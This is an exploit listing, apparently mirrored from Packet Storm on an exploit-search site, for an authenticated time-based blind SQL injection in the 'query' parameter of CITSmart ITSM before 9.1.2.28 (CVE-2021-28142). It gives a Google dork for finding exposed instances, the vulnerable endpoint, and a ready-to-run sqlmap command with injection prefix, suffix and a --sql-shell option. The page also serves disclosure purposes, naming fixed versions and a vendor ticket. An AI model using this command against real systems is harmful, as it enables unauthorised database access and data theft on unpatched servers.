Exploit for CITSmart ITSM 9.1.2.27 SQL Injection CVE-2021-28142

Name: Exploit for CITSmart ITSM 9.1.2.27 SQL Injection CVE-2021-28142
Rating: 5 (219 reviews)

2021-04-14 | CVSS 0.2

## https://sploitus.com/exploit?id=PACKETSTORM:162182
# Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)  
# Google Dork: "citsmart.local"  
# Date: 11/03/2021  
# Exploit Author: skysbsb  
# Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html  
# Version: < 9.1.2.28  
# CVE : CVE-2021-28142  
  
To exploit this flaw it is necessary to be authenticated.  
  
URL vulnerable:  
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale  
Param vulnerable: query  
  
Sqlmap usage: sqlmap -u "  
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell  
  
Affected versions: < 9.1.2.28  
Fixed versions: >= 9.1.2.28  
  
Vendor has acknowledge this vulnerability at ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html)